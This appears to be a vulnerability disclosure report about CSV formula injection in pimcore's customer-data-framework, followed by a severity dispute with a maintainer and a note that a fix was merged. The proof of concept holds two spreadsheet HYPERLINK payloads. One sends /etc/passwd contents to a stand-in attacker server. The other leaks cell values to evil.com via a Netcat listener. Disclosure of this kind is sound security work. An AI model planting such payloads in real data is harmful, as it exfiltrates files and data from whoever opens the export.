Embeding untrusted input inside CSV files leads to Formula Injection/CSV Injection in pimcore/customer-data-framework
Reported on
Mar 22nd 2023
Description
The pimcore application is vulnerable to Formula Injection/CSV Injection via the Firstname, Lastname, Street, Zip & City input fields. These vulnerabilities allow unauthenticated attackers to execute arbitrary code via a crafted excel file.
Proof of Concepta
1.Go to "https://demo.pimcore.fun/en/account/register" and register an account by inserting the below payloads in "Firstname" & "Lastname".
2.Payloads:-
=HYPERLINK(CONCATENATE("http://attackerserver:port/a.txt?v="; ('file:///etc/passwd'#$passwd.A1)); "poc")
=HYPERLINK("http://evil.com?x="&A3&","&B3&"[CR]","Error fetching info: Click me to resolve.")
3.Start your python server or Netcat listener.
4.Then from admin account go to "Customers" click on "Export Data in CSV Format".
5.Open the downloaded CSV and click on poc and Error fetching info: Click me to resolve. you will see that attacker able to get /etc/passwd of admin system and also he will get redirected to evil.com.
PoC Video
https://drive.google.com/file/d/1SiberemDJyF4DyU5qBnd8Fdbyl5U82aZ/view?usp=share_link
Solutions
This attack is difficult to mitigate and is explicitly disallowed from quite a few bug bounty programs. To remediate it, ensure that no cells begin with any of the following characters:
Equals to (=)
Plus (+)
Minus (-)
At (@)
Tab (0x09)
Carriage return (0x0D)
Impact
Successful exploitation can lead to impacts such as client-sided command injection, code execution, or remote ex-filtration of contained confidential data.
References
@brusch The Severity should be high for this report as anyone can perform this attack, it don't need any privilege users to perform this attack.
But you have only authenticated users ... so actually it's not as serious. You also shared:
This attack is difficult to mitigate and is explicitly disallowed from quite a few bug bounty programs.
@brusch Thank you for your response. I understand that the vulnerability may require authentication, but it should be noted that anyone can sign up for the application and exploit the vulnerability as demonstrated in this video: https://drive.google.com/file/d/1SiberemDJyF4DyU5qBnd8Fdbyl5U82aZ/view?usp=share_link . This significantly increases the risk and impact of the vulnerability and should be taken into consideration when evaluating its severity.
As I mentioned before, the vulnerability can be difficult to mitigate and is explicitly disallowed in other bug bounty programs. Additionally, other similar vulnerabilities in similar applications have been classified as high/critical severity. please check the below mentions report consider as higher/critical severity for this vulnerability:
https://nvd.nist.gov/vuln/detail/CVE-2022-3600
https://nvd.nist.gov/vuln/detail/CVE-2022-28481
https://huntr.dev/bounties/fa6d6e75-bc7a-40f6-9bdd-2541318912d4/
If you scored the vulnerability according to the exploitation then its comes under the following severity: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Fixed in https://github.com/pimcore/customer-data-framework/pull/453 Unfortunately we can't reference it in the fix here, because it was reported to the wrong GitHub repository.
@admin can you maybe move this to https://github.com/pimcore/customer-data-framework or mark this as fixed, since we can't do this without referencing a commit hash. Thanks a lot!
@brusch Any update on the severity for this vulnerability?
Tagging @admin as not getting any response from the admin side.
The repository reference has now been updated, you should be able to mark as fixed without any issues now:)
@brusch @Maintainer Now you can mark it as fixed and update the CVS scope if possible
